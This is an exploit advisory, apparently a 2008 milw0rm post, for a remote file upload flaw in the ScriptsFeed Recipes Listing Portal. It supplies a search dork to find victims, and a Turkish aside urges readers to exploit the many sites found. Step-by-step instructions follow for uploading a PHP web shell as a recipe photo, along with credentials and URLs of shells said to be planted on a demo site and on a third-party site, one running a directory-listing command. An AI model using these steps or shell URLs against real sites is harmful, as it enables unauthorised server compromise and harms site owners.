Vulmon
[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script/pictures/[id]your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you click to "Add a Recipe" and add recipe
and after click to "View your Recipes" click to you recipe open new page
right click to your photo. select properties copy photo lick
and paste your explorer go your shell
your_shell.php path:
http://localhost/script/pictures/[id]your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
example 2:
user: zorlu
passwd: zorlu1
shell:
http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
misal:
http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-13]